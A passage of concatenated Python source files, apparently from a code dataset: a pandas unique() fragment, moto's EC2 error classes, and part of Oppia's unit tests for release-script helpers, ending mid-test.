uniques = np.array(table.unique(com._ensure_float64(values)),
dtype=np.float64)
elif np.issubdtype(values.dtype, np.datetime64):
table = _hash.Int64HashTable(len(values))
uniques = table.unique(com._ensure_int64(values))
uniques = uniques.view('M8[ns]')
elif np.issubdtype(values.dtype, np.integer):
table = _hash.Int64HashTable(len(values))
uniques = table.unique(com._ensure_int64(values))
else:
table = _hash.PyObjectHashTable(len(values))
uniques = table.unique(com._ensure_object(values))
return uniques
|
py | b40334cea43e56a46ebf927c4abb140ee1aea66f | import os
import glob
__all__ = [os.path.basename(f)[:-3]
for f in glob.glob(os.path.dirname(__file__) + "/*.py")
if not os.path.basename(f).startswith('_')]
|
py | b40334fa99589e108ffce014aa7f6e2004e7b6a4 | from uploader.upload import main
if __name__ == '__main__':
main()
|
py | b40335b2d05b7cfbe0a3f00966c537ea7d8f28aa | from __future__ import unicode_literals
from moto.core.exceptions import RESTError
class EC2ClientError(RESTError):
code = 400
# EC2 uses <RequestID> as tag name in the XML response
request_id_tag_name = "RequestID"
class DependencyViolationError(EC2ClientError):
def __init__(self, message):
super(DependencyViolationError, self).__init__("DependencyViolation", message)
class MissingParameterError(EC2ClientError):
def __init__(self, parameter):
super(MissingParameterError, self).__init__(
"MissingParameter",
"The request must contain the parameter {0}".format(parameter),
)
class InvalidDHCPOptionsIdError(EC2ClientError):
def __init__(self, dhcp_options_id):
super(InvalidDHCPOptionsIdError, self).__init__(
"InvalidDhcpOptionID.NotFound",
"DhcpOptionID {0} does not exist.".format(dhcp_options_id),
)
class MalformedDHCPOptionsIdError(EC2ClientError):
def __init__(self, dhcp_options_id):
super(MalformedDHCPOptionsIdError, self).__init__(
"InvalidDhcpOptionsId.Malformed",
'Invalid id: "{0}" (expecting "dopt-...")'.format(dhcp_options_id),
)
class InvalidKeyPairNameError(EC2ClientError):
def __init__(self, key):
super(InvalidKeyPairNameError, self).__init__(
"InvalidKeyPair.NotFound", "The keypair '{0}' does not exist.".format(key)
)
class InvalidKeyPairDuplicateError(EC2ClientError):
def __init__(self, key):
super(InvalidKeyPairDuplicateError, self).__init__(
"InvalidKeyPair.Duplicate", "The keypair '{0}' already exists.".format(key)
)
class InvalidKeyPairFormatError(EC2ClientError):
def __init__(self):
super(InvalidKeyPairFormatError, self).__init__(
"InvalidKeyPair.Format", "Key is not in valid OpenSSH public key format"
)
class InvalidVPCIdError(EC2ClientError):
def __init__(self, vpc_id):
super(InvalidVPCIdError, self).__init__(
"InvalidVpcID.NotFound", "VpcID {0} does not exist.".format(vpc_id)
)
class InvalidSubnetIdError(EC2ClientError):
def __init__(self, subnet_id):
super(InvalidSubnetIdError, self).__init__(
"InvalidSubnetID.NotFound",
"The subnet ID '{}' does not exist".format(subnet_id),
)
class InvalidFlowLogIdError(EC2ClientError):
def __init__(self, count, flow_log_ids):
super(InvalidFlowLogIdError, self).__init__(
"InvalidFlowLogId.NotFound",
"These flow log ids in the input list are not found: [TotalCount: {0}] {1}".format(
count, flow_log_ids
),
)
class FlowLogAlreadyExists(EC2ClientError):
def __init__(self):
super(FlowLogAlreadyExists, self).__init__(
"FlowLogAlreadyExists",
"Error. There is an existing Flow Log with the same configuration and log destination.",
)
class InvalidNetworkAclIdError(EC2ClientError):
def __init__(self, network_acl_id):
super(InvalidNetworkAclIdError, self).__init__(
"InvalidNetworkAclID.NotFound",
"The network acl ID '{0}' does not exist".format(network_acl_id),
)
class InvalidVpnGatewayIdError(EC2ClientError):
def __init__(self, network_acl_id):
super(InvalidVpnGatewayIdError, self).__init__(
"InvalidVpnGatewayID.NotFound",
"The virtual private gateway ID '{0}' does not exist".format(
network_acl_id
),
)
class InvalidVpnConnectionIdError(EC2ClientError):
def __init__(self, network_acl_id):
super(InvalidVpnConnectionIdError, self).__init__(
"InvalidVpnConnectionID.NotFound",
"The vpnConnection ID '{0}' does not exist".format(network_acl_id),
)
class InvalidCustomerGatewayIdError(EC2ClientError):
def __init__(self, customer_gateway_id):
super(InvalidCustomerGatewayIdError, self).__init__(
"InvalidCustomerGatewayID.NotFound",
"The customer gateway ID '{0}' does not exist".format(customer_gateway_id),
)
class InvalidNetworkInterfaceIdError(EC2ClientError):
def __init__(self, eni_id):
super(InvalidNetworkInterfaceIdError, self).__init__(
"InvalidNetworkInterfaceID.NotFound",
"The network interface ID '{0}' does not exist".format(eni_id),
)
class InvalidNetworkAttachmentIdError(EC2ClientError):
def __init__(self, attachment_id):
super(InvalidNetworkAttachmentIdError, self).__init__(
"InvalidAttachmentID.NotFound",
"The network interface attachment ID '{0}' does not exist".format(
attachment_id
),
)
class InvalidSecurityGroupDuplicateError(EC2ClientError):
def __init__(self, name):
super(InvalidSecurityGroupDuplicateError, self).__init__(
"InvalidGroup.Duplicate",
"The security group '{0}' already exists".format(name),
)
class InvalidSecurityGroupNotFoundError(EC2ClientError):
def __init__(self, name):
super(InvalidSecurityGroupNotFoundError, self).__init__(
"InvalidGroup.NotFound",
"The security group '{0}' does not exist".format(name),
)
class InvalidPermissionNotFoundError(EC2ClientError):
def __init__(self):
super(InvalidPermissionNotFoundError, self).__init__(
"InvalidPermission.NotFound",
"The specified rule does not exist in this security group",
)
class InvalidPermissionDuplicateError(EC2ClientError):
def __init__(self):
super(InvalidPermissionDuplicateError, self).__init__(
"InvalidPermission.Duplicate", "The specified rule already exists"
)
class InvalidRouteTableIdError(EC2ClientError):
def __init__(self, route_table_id):
super(InvalidRouteTableIdError, self).__init__(
"InvalidRouteTableID.NotFound",
"The routeTable ID '{0}' does not exist".format(route_table_id),
)
class InvalidRouteError(EC2ClientError):
def __init__(self, route_table_id, cidr):
super(InvalidRouteError, self).__init__(
"InvalidRoute.NotFound",
"no route with destination-cidr-block {0} in route table {1}".format(
cidr, route_table_id
),
)
class InvalidInstanceIdError(EC2ClientError):
def __init__(self, instance_id):
super(InvalidInstanceIdError, self).__init__(
"InvalidInstanceID.NotFound",
"The instance ID '{0}' does not exist".format(instance_id),
)
class InvalidInstanceTypeError(EC2ClientError):
def __init__(self, instance_type):
super(InvalidInstanceTypeError, self).__init__(
"InvalidInstanceType.NotFound",
"The instance type '{0}' does not exist".format(instance_type),
)
class InvalidAMIIdError(EC2ClientError):
def __init__(self, ami_id):
super(InvalidAMIIdError, self).__init__(
"InvalidAMIID.NotFound",
"The image id '[{0}]' does not exist".format(ami_id),
)
class InvalidAMIAttributeItemValueError(EC2ClientError):
def __init__(self, attribute, value):
super(InvalidAMIAttributeItemValueError, self).__init__(
"InvalidAMIAttributeItemValue",
'Invalid attribute item value "{0}" for {1} item type.'.format(
value, attribute
),
)
class MalformedAMIIdError(EC2ClientError):
def __init__(self, ami_id):
super(MalformedAMIIdError, self).__init__(
"InvalidAMIID.Malformed",
'Invalid id: "{0}" (expecting "ami-...")'.format(ami_id),
)
class InvalidSnapshotIdError(EC2ClientError):
def __init__(self, snapshot_id):
super(InvalidSnapshotIdError, self).__init__(
"InvalidSnapshot.NotFound", ""
) # Note: AWS returns empty message for this, as of 2014.08.22.
class InvalidVolumeIdError(EC2ClientError):
def __init__(self, volume_id):
super(InvalidVolumeIdError, self).__init__(
"InvalidVolume.NotFound",
"The volume '{0}' does not exist.".format(volume_id),
)
class InvalidVolumeAttachmentError(EC2ClientError):
def __init__(self, volume_id, instance_id):
super(InvalidVolumeAttachmentError, self).__init__(
"InvalidAttachment.NotFound",
"Volume {0} can not be detached from {1} because it is not attached".format(
volume_id, instance_id
),
)
class InvalidVolumeDetachmentError(EC2ClientError):
def __init__(self, volume_id, instance_id, device):
super(InvalidVolumeDetachmentError, self).__init__(
"InvalidAttachment.NotFound",
"The volume {0} is not attached to instance {1} as device {2}".format(
volume_id, instance_id, device
),
)
class VolumeInUseError(EC2ClientError):
def __init__(self, volume_id, instance_id):
super(VolumeInUseError, self).__init__(
"VolumeInUse",
"Volume {0} is currently attached to {1}".format(volume_id, instance_id),
)
class InvalidDomainError(EC2ClientError):
def __init__(self, domain):
super(InvalidDomainError, self).__init__(
"InvalidParameterValue", "Invalid value '{0}' for domain.".format(domain)
)
class InvalidAddressError(EC2ClientError):
def __init__(self, ip):
super(InvalidAddressError, self).__init__(
"InvalidAddress.NotFound", "Address '{0}' not found.".format(ip)
)
class LogDestinationNotFoundError(EC2ClientError):
def __init__(self, bucket_name):
super(LogDestinationNotFoundError, self).__init__(
"LogDestinationNotFoundException",
"LogDestination: '{0}' does not exist.".format(bucket_name),
)
class InvalidAllocationIdError(EC2ClientError):
def __init__(self, allocation_id):
super(InvalidAllocationIdError, self).__init__(
"InvalidAllocationID.NotFound",
"Allocation ID '{0}' not found.".format(allocation_id),
)
class InvalidAssociationIdError(EC2ClientError):
def __init__(self, association_id):
super(InvalidAssociationIdError, self).__init__(
"InvalidAssociationID.NotFound",
"Association ID '{0}' not found.".format(association_id),
)
class InvalidVpcCidrBlockAssociationIdError(EC2ClientError):
def __init__(self, association_id):
super(InvalidVpcCidrBlockAssociationIdError, self).__init__(
"InvalidVpcCidrBlockAssociationIdError.NotFound",
"The vpc CIDR block association ID '{0}' does not exist".format(
association_id
),
)
class InvalidVPCPeeringConnectionIdError(EC2ClientError):
def __init__(self, vpc_peering_connection_id):
super(InvalidVPCPeeringConnectionIdError, self).__init__(
"InvalidVpcPeeringConnectionId.NotFound",
"VpcPeeringConnectionID {0} does not exist.".format(
vpc_peering_connection_id
),
)
class InvalidVPCPeeringConnectionStateTransitionError(EC2ClientError):
def __init__(self, vpc_peering_connection_id):
super(InvalidVPCPeeringConnectionStateTransitionError, self).__init__(
"InvalidStateTransition",
"VpcPeeringConnectionID {0} is not in the correct state for the request.".format(
vpc_peering_connection_id
),
)
class InvalidDependantParameterError(EC2ClientError):
def __init__(self, dependant_parameter, parameter, parameter_value):
super(InvalidDependantParameterError, self).__init__(
"InvalidParameter",
"{0} can't be empty if {1} is {2}.".format(
dependant_parameter, parameter, parameter_value,
),
)
class InvalidDependantParameterTypeError(EC2ClientError):
def __init__(self, dependant_parameter, parameter_value, parameter):
super(InvalidDependantParameterTypeError, self).__init__(
"InvalidParameter",
"{0} type must be {1} if {2} is provided.".format(
dependant_parameter, parameter_value, parameter,
),
)
class InvalidAggregationIntervalParameterError(EC2ClientError):
def __init__(self, parameter):
super(InvalidAggregationIntervalParameterError, self).__init__(
"InvalidParameter", "Invalid {0}".format(parameter),
)
class InvalidParameterValueError(EC2ClientError):
def __init__(self, parameter_value):
super(InvalidParameterValueError, self).__init__(
"InvalidParameterValue",
"Value {0} is invalid for parameter.".format(parameter_value),
)
class InvalidParameterValueErrorTagNull(EC2ClientError):
def __init__(self):
super(InvalidParameterValueErrorTagNull, self).__init__(
"InvalidParameterValue",
"Tag value cannot be null. Use empty string instead.",
)
class InvalidParameterValueErrorUnknownAttribute(EC2ClientError):
def __init__(self, parameter_value):
super(InvalidParameterValueErrorUnknownAttribute, self).__init__(
"InvalidParameterValue",
"Value ({0}) for parameter attribute is invalid. Unknown attribute.".format(
parameter_value
),
)
class InvalidGatewayIDError(EC2ClientError):
def __init__(self, gateway_id):
super(InvalidGatewayIDError, self).__init__(
"InvalidGatewayID.NotFound",
"The eigw ID '{0}' does not exist".format(gateway_id),
)
class InvalidInternetGatewayIdError(EC2ClientError):
def __init__(self, internet_gateway_id):
super(InvalidInternetGatewayIdError, self).__init__(
"InvalidInternetGatewayID.NotFound",
"InternetGatewayID {0} does not exist.".format(internet_gateway_id),
)
class GatewayNotAttachedError(EC2ClientError):
def __init__(self, internet_gateway_id, vpc_id):
super(GatewayNotAttachedError, self).__init__(
"Gateway.NotAttached",
"InternetGatewayID {0} is not attached to a VPC {1}.".format(
internet_gateway_id, vpc_id
),
)
class ResourceAlreadyAssociatedError(EC2ClientError):
def __init__(self, resource_id):
super(ResourceAlreadyAssociatedError, self).__init__(
"Resource.AlreadyAssociated",
"Resource {0} is already associated.".format(resource_id),
)
class TagLimitExceeded(EC2ClientError):
def __init__(self):
super(TagLimitExceeded, self).__init__(
"TagLimitExceeded",
"The maximum number of Tags for a resource has been reached.",
)
class InvalidID(EC2ClientError):
def __init__(self, resource_id):
super(InvalidID, self).__init__(
"InvalidID", "The ID '{0}' is not valid".format(resource_id)
)
class InvalidCIDRSubnetError(EC2ClientError):
def __init__(self, cidr):
super(InvalidCIDRSubnetError, self).__init__(
"InvalidParameterValue",
"invalid CIDR subnet specification: {0}".format(cidr),
)
class RulesPerSecurityGroupLimitExceededError(EC2ClientError):
def __init__(self):
super(RulesPerSecurityGroupLimitExceededError, self).__init__(
"RulesPerSecurityGroupLimitExceeded",
"The maximum number of rules per security group " "has been reached.",
)
class MotoNotImplementedError(NotImplementedError):
def __init__(self, blurb):
super(MotoNotImplementedError, self).__init__(
"{0} has not been implemented in Moto yet."
" Feel free to open an issue at"
" https://github.com/spulec/moto/issues".format(blurb)
)
class FilterNotImplementedError(MotoNotImplementedError):
def __init__(self, filter_name, method_name):
super(FilterNotImplementedError, self).__init__(
"The filter '{0}' for {1}".format(filter_name, method_name)
)
class CidrLimitExceeded(EC2ClientError):
def __init__(self, vpc_id, max_cidr_limit):
super(CidrLimitExceeded, self).__init__(
"CidrLimitExceeded",
"This network '{0}' has met its maximum number of allowed CIDRs: {1}".format(
vpc_id, max_cidr_limit
),
)
class UnsupportedTenancy(EC2ClientError):
def __init__(self, tenancy):
super(UnsupportedTenancy, self).__init__(
"UnsupportedTenancy",
"The tenancy value {0} is not supported.".format(tenancy),
)
class OperationNotPermitted(EC2ClientError):
def __init__(self, association_id):
super(OperationNotPermitted, self).__init__(
"OperationNotPermitted",
"The vpc CIDR block with association ID {} may not be disassociated. "
"It is the primary IPv4 CIDR block of the VPC".format(association_id),
)
class InvalidAvailabilityZoneError(EC2ClientError):
def __init__(self, availability_zone_value, valid_availability_zones):
super(InvalidAvailabilityZoneError, self).__init__(
"InvalidParameterValue",
"Value ({0}) for parameter availabilityZone is invalid. "
"Subnets can currently only be created in the following availability zones: {1}.".format(
availability_zone_value, valid_availability_zones
),
)
class NetworkAclEntryAlreadyExistsError(EC2ClientError):
def __init__(self, rule_number):
super(NetworkAclEntryAlreadyExistsError, self).__init__(
"NetworkAclEntryAlreadyExists",
"The network acl entry identified by {} already exists.".format(
rule_number
),
)
class InvalidSubnetRangeError(EC2ClientError):
def __init__(self, cidr_block):
super(InvalidSubnetRangeError, self).__init__(
"InvalidSubnet.Range", "The CIDR '{}' is invalid.".format(cidr_block)
)
class InvalidCIDRBlockParameterError(EC2ClientError):
def __init__(self, cidr_block):
super(InvalidCIDRBlockParameterError, self).__init__(
"InvalidParameterValue",
"Value ({}) for parameter cidrBlock is invalid. This is not a valid CIDR block.".format(
cidr_block
),
)
class InvalidDestinationCIDRBlockParameterError(EC2ClientError):
def __init__(self, cidr_block):
super(InvalidDestinationCIDRBlockParameterError, self).__init__(
"InvalidParameterValue",
"Value ({}) for parameter destinationCidrBlock is invalid. This is not a valid CIDR block.".format(
cidr_block
),
)
class InvalidSubnetConflictError(EC2ClientError):
def __init__(self, cidr_block):
super(InvalidSubnetConflictError, self).__init__(
"InvalidSubnet.Conflict",
"The CIDR '{}' conflicts with another subnet".format(cidr_block),
)
class InvalidVPCRangeError(EC2ClientError):
def __init__(self, cidr_block):
super(InvalidVPCRangeError, self).__init__(
"InvalidVpc.Range", "The CIDR '{}' is invalid.".format(cidr_block)
)
# accept exception
class OperationNotPermitted2(EC2ClientError):
def __init__(self, client_region, pcx_id, acceptor_region):
super(OperationNotPermitted2, self).__init__(
"OperationNotPermitted",
"Incorrect region ({0}) specified for this request."
"VPC peering connection {1} must be accepted in region {2}".format(
client_region, pcx_id, acceptor_region
),
)
# reject exception
class OperationNotPermitted3(EC2ClientError):
def __init__(self, client_region, pcx_id, acceptor_region):
super(OperationNotPermitted3, self).__init__(
"OperationNotPermitted",
"Incorrect region ({0}) specified for this request."
"VPC peering connection {1} must be accepted or rejected in region {2}".format(
client_region, pcx_id, acceptor_region
),
)
class OperationNotPermitted4(EC2ClientError):
def __init__(self, instance_id):
super(OperationNotPermitted4, self).__init__(
"OperationNotPermitted",
"The instance '{0}' may not be terminated. Modify its 'disableApiTermination' "
"instance attribute and try again.".format(instance_id),
)
class InvalidLaunchTemplateNameError(EC2ClientError):
def __init__(self):
super(InvalidLaunchTemplateNameError, self).__init__(
"InvalidLaunchTemplateName.AlreadyExistsException",
"Launch template name already in use.",
)
class InvalidParameterDependency(EC2ClientError):
def __init__(self, param, param_needed):
super(InvalidParameterDependency, self).__init__(
"InvalidParameterDependency",
"The parameter [{0}] requires the parameter {1} to be set.".format(
param, param_needed
),
)
class IncorrectStateIamProfileAssociationError(EC2ClientError):
def __init__(self, instance_id):
super(IncorrectStateIamProfileAssociationError, self).__init__(
"IncorrectState",
"There is an existing association for instance {0}".format(instance_id),
)
class InvalidAssociationIDIamProfileAssociationError(EC2ClientError):
def __init__(self, association_id):
super(InvalidAssociationIDIamProfileAssociationError, self).__init__(
"InvalidAssociationID.NotFound",
"An invalid association-id of '{0}' was given".format(association_id),
)
class InvalidVpcEndPointIdError(EC2ClientError):
def __init__(self, vpc_end_point_id):
super(InvalidVpcEndPointIdError, self).__init__(
"InvalidVpcEndpointId.NotFound",
"The VpcEndPoint ID '{0}' does not exist".format(vpc_end_point_id),
)
class InvalidTaggableResourceType(EC2ClientError):
def __init__(self, resource_type):
super(InvalidTaggableResourceType, self).__init__(
"InvalidParameterValue",
"'{}' is not a valid taggable resource type for this operation.".format(
resource_type
),
)
|
py | b40335c391df32b89d3c78d29ea231981d4dbe60 | #
# Copyright 2019 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for scripts/common.py."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import contextlib
import getpass
import http.server
import os
import re
import shutil
import socketserver
import stat
import subprocess
import sys
import tempfile
from core.tests import test_utils
import psutil
import python_utils
import release_constants
from . import common
_PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
_PY_GITHUB_PATH = os.path.join(
_PARENT_DIR, 'oppia_tools', 'PyGithub-%s' % common.PYGITHUB_VERSION)
sys.path.insert(0, _PY_GITHUB_PATH)
# pylint: disable=wrong-import-position
import github # isort:skip
# pylint: enable=wrong-import-position
class MockPsutilProcess(python_utils.OBJECT):
"""A mock class for Process class in Psutil."""
cmdlines = [
['dev_appserver.py', '--host', '0.0.0.0', '--port', '9001'],
['downloads']
]
def __init__(self, index):
"""Constructor for this mock object.
Args:
index: int. The index of process to be checked.
"""
self.index = index
def cmdline(self):
"""Return the command line of this process."""
pass
def kill(self):
"""Kill the process."""
pass
def is_running(self):
"""Check whether the function is running."""
return True
class CommonTests(test_utils.GenericTestBase):
"""Test the methods which handle common functionalities."""
def test_is_x64_architecture_in_x86(self):
maxsize_swap = self.swap(sys, 'maxsize', 1)
with maxsize_swap:
self.assertFalse(common.is_x64_architecture())
def test_is_x64_architecture_in_x64(self):
maxsize_swap = self.swap(sys, 'maxsize', 2**32 + 1)
with maxsize_swap:
self.assertTrue(common.is_x64_architecture())
def test_run_cmd(self):
self.assertEqual(
common.run_cmd(('echo Test for common.py ').split(' ')),
'Test for common.py')
def test_ensure_directory_exists_with_existing_dir(self):
check_function_calls = {
'makedirs_gets_called': False
}
def mock_makedirs(unused_dirpath):
check_function_calls['makedirs_gets_called'] = True
with self.swap(os, 'makedirs', mock_makedirs):
common.ensure_directory_exists('assets')
self.assertEqual(check_function_calls, {'makedirs_gets_called': False})
def test_ensure_directory_exists_with_non_existing_dir(self):
check_function_calls = {
'makedirs_gets_called': False
}
def mock_makedirs(unused_dirpath):
check_function_calls['makedirs_gets_called'] = True
with self.swap(os, 'makedirs', mock_makedirs):
common.ensure_directory_exists('test-dir')
self.assertEqual(check_function_calls, {'makedirs_gets_called': True})
def test_require_cwd_to_be_oppia_with_correct_cwd_and_unallowed_deploy_dir(
self):
common.require_cwd_to_be_oppia()
def test_require_cwd_to_be_oppia_with_correct_cwd_and_allowed_deploy_dir(
self):
common.require_cwd_to_be_oppia(allow_deploy_dir=True)
def test_require_cwd_to_be_oppia_with_wrong_cwd_and_unallowed_deploy_dir(
self):
def mock_getcwd():
return 'invalid'
getcwd_swap = self.swap(os, 'getcwd', mock_getcwd)
with getcwd_swap, self.assertRaisesRegexp(
Exception, 'Please run this script from the oppia/ directory.'):
common.require_cwd_to_be_oppia()
def test_require_cwd_to_be_oppia_with_wrong_cwd_and_allowed_deploy_dir(
self):
def mock_getcwd():
return 'invalid'
def mock_basename(unused_dirpath):
return 'deploy-dir'
def mock_isdir(unused_dirpath):
return True
getcwd_swap = self.swap(os, 'getcwd', mock_getcwd)
basename_swap = self.swap(os.path, 'basename', mock_basename)
isdir_swap = self.swap(os.path, 'isdir', mock_isdir)
with getcwd_swap, basename_swap, isdir_swap:
common.require_cwd_to_be_oppia(allow_deploy_dir=True)
def test_open_new_tab_in_browser_if_possible_with_user_manually_opening_url(
self):
try:
check_function_calls = {
'input_gets_called': 0,
'check_call_gets_called': False
}
expected_check_function_calls = {
'input_gets_called': 1,
'check_call_gets_called': False
}
def mock_call(unused_cmd_tokens):
return 0
def mock_check_call(unused_cmd_tokens):
check_function_calls['check_call_gets_called'] = True
def mock_input():
check_function_calls['input_gets_called'] += 1
return 'n'
call_swap = self.swap(subprocess, 'call', mock_call)
check_call_swap = self.swap(
subprocess, 'check_call', mock_check_call)
input_swap = self.swap(python_utils, 'INPUT', mock_input)
with call_swap, check_call_swap, input_swap:
common.open_new_tab_in_browser_if_possible('test-url')
self.assertEqual(
check_function_calls, expected_check_function_calls)
finally:
common.USER_PREFERENCES['open_new_tab_in_browser'] = None
def test_open_new_tab_in_browser_if_possible_with_url_opening_correctly(
self):
try:
check_function_calls = {
'input_gets_called': 0,
'check_call_gets_called': False
}
expected_check_function_calls = {
'input_gets_called': 1,
'check_call_gets_called': True
}
def mock_call(unused_cmd_tokens):
return 0
def mock_check_call(unused_cmd_tokens):
check_function_calls['check_call_gets_called'] = True
def mock_input():
check_function_calls['input_gets_called'] += 1
return 'y'
call_swap = self.swap(subprocess, 'call', mock_call)
check_call_swap = self.swap(
subprocess, 'check_call', mock_check_call)
input_swap = self.swap(python_utils, 'INPUT', mock_input)
with call_swap, check_call_swap, input_swap:
common.open_new_tab_in_browser_if_possible('test-url')
self.assertEqual(
check_function_calls, expected_check_function_calls)
finally:
common.USER_PREFERENCES['open_new_tab_in_browser'] = None
def test_open_new_tab_in_browser_if_possible_with_url_not_opening_correctly(
self):
try:
check_function_calls = {
'input_gets_called': 0,
'check_call_gets_called': False
}
expected_check_function_calls = {
'input_gets_called': 2,
'check_call_gets_called': False
}
def mock_call(unused_cmd_tokens):
return 1
def mock_check_call(unused_cmd_tokens):
check_function_calls['check_call_gets_called'] = True
def mock_input():
check_function_calls['input_gets_called'] += 1
return 'y'
call_swap = self.swap(subprocess, 'call', mock_call)
check_call_swap = self.swap(
subprocess, 'check_call', mock_check_call)
input_swap = self.swap(python_utils, 'INPUT', mock_input)
with call_swap, check_call_swap, input_swap:
common.open_new_tab_in_browser_if_possible('test-url')
self.assertEqual(
check_function_calls, expected_check_function_calls)
finally:
common.USER_PREFERENCES['open_new_tab_in_browser'] = None
def test_get_remote_alias_with_correct_alias(self):
def mock_check_output(unused_cmd_tokens):
return 'remote1 url1\nremote2 url2'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.get_remote_alias('url1'), 'remote1')
def test_get_remote_alias_with_incorrect_alias(self):
def mock_check_output(unused_cmd_tokens):
return 'remote1 url1\nremote2 url2'
check_output_swap = self.swap(
subprocess, 'check_output', mock_check_output)
with check_output_swap, self.assertRaisesRegexp(
Exception,
'ERROR: There is no existing remote alias for the url3 repo.'):
common.get_remote_alias('url3')
def test_verify_local_repo_is_clean_with_clean_repo(self):
def mock_check_output(unused_cmd_tokens):
return 'nothing to commit, working directory clean'
with self.swap(
subprocess, 'check_output', mock_check_output):
common.verify_local_repo_is_clean()
def test_verify_local_repo_is_clean_with_unclean_repo(self):
def mock_check_output(unused_cmd_tokens):
return 'invalid'
check_output_swap = self.swap(
subprocess, 'check_output', mock_check_output)
with check_output_swap, self.assertRaisesRegexp(
Exception, 'ERROR: This script should be run from a clean branch.'):
common.verify_local_repo_is_clean()
def test_get_current_branch_name(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch test'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.get_current_branch_name(), 'test')
def test_get_current_release_version_number_with_non_hotfix_branch(self):
self.assertEqual(
common.get_current_release_version_number('release-1.2.3'), '1.2.3')
def test_get_current_release_version_number_with_hotfix_branch(self):
self.assertEqual(
common.get_current_release_version_number('release-1.2.3-hotfix-1'),
'1.2.3')
def test_get_current_release_version_number_with_maintenance_branch(self):
self.assertEqual(
common.get_current_release_version_number(
'release-maintenance-1.2.3'), '1.2.3')
def test_get_current_release_version_number_with_invalid_branch(self):
with self.assertRaisesRegexp(
Exception, 'Invalid branch name: invalid-branch.'):
common.get_current_release_version_number('invalid-branch')
def test_is_current_branch_a_hotfix_branch_with_non_hotfix_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch release-1.2.3'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_hotfix_branch(), False)
def test_is_current_branch_a_hotfix_branch_with_hotfix_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch release-1.2.3-hotfix-1'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_hotfix_branch(), True)
def test_is_current_branch_a_release_branch_with_release_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch release-1.2.3'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_release_branch(), True)
def test_is_current_branch_a_release_branch_with_hotfix_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch release-1.2.3-hotfix-1'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_release_branch(), True)
def test_is_current_branch_a_release_branch_with_maintenance_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch release-maintenance-1.2.3'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_release_branch(), True)
def test_is_current_branch_a_release_branch_with_non_release_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch test'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_release_branch(), False)
def test_is_current_branch_a_test_branch_with_test_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch test-common'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_test_branch(), True)
def test_is_current_branch_a_test_branch_with_non_test_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch invalid-test'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_test_branch(), False)
def test_verify_current_branch_name_with_correct_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch test'
with self.swap(
subprocess, 'check_output', mock_check_output):
common.verify_current_branch_name('test')
def test_verify_current_branch_name_with_incorrect_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch invalid'
check_output_swap = self.swap(
subprocess, 'check_output', mock_check_output)
with check_output_swap, self.assertRaisesRegexp(
Exception,
'ERROR: This script can only be run from the "test" branch.'):
common.verify_current_branch_name('test')
def test_ensure_release_scripts_folder_exists_with_invalid_access(self):
process = subprocess.Popen(['test'], stdout=subprocess.PIPE)
def mock_isdir(unused_dirpath):
return False
def mock_chdir(unused_dirpath):
pass
# pylint: disable=unused-argument
def mock_popen(unused_cmd, stdin, stdout, stderr):
return process
# pylint: enable=unused-argument
def mock_communicate(unused_self):
return ('Output', 'Invalid')
isdir_swap = self.swap(os.path, 'isdir', mock_isdir)
chdir_swap = self.swap(os, 'chdir', mock_chdir)
popen_swap = self.swap(subprocess, 'Popen', mock_popen)
communicate_swap = self.swap(
subprocess.Popen, 'communicate', mock_communicate)
with isdir_swap, chdir_swap, popen_swap, communicate_swap:
with self.assertRaisesRegexp(
Exception, (
'You need SSH access to GitHub. See the '
'"Check your SSH access" section here and follow the '
'instructions: '
'https://help.github.com/articles/'
'error-repository-not-found/#check-your-ssh-access')):
common.ensure_release_scripts_folder_exists_and_is_up_to_date()
def test_ensure_release_scripts_folder_exists_with_valid_access(self):
process = subprocess.Popen(['test'], stdout=subprocess.PIPE)
def mock_isdir(unused_dirpath):
return False
def mock_chdir(unused_dirpath):
pass
# pylint: disable=unused-argument
def mock_popen(unused_cmd, stdin, stdout, stderr):
return process
# pylint: enable=unused-argument
def mock_communicate(unused_self):
return ('Output', 'You\'ve successfully authenticated!')
def mock_check_call(unused_cmd_tokens):
pass
def mock_verify_local_repo_is_clean():
pass
def mock_verify_current_branch_name(unused_branch_name):
pass
def mock_get_remote_alias(unused_url):
return 'remote'
isdir_swap = self.swap(os.path, 'isdir', mock_isdir)
chdir_swap = self.swap(os, 'chdir', mock_chdir)
popen_swap = self.swap(subprocess, 'Popen', mock_popen)
communicate_swap = self.swap(
subprocess.Popen, 'communicate', mock_communicate)
check_call_swap = self.swap(
subprocess, 'check_call', mock_check_call)
verify_local_repo_swap = self.swap(
common, 'verify_local_repo_is_clean',
mock_verify_local_repo_is_clean)
verify_current_branch_name_swap = self.swap(
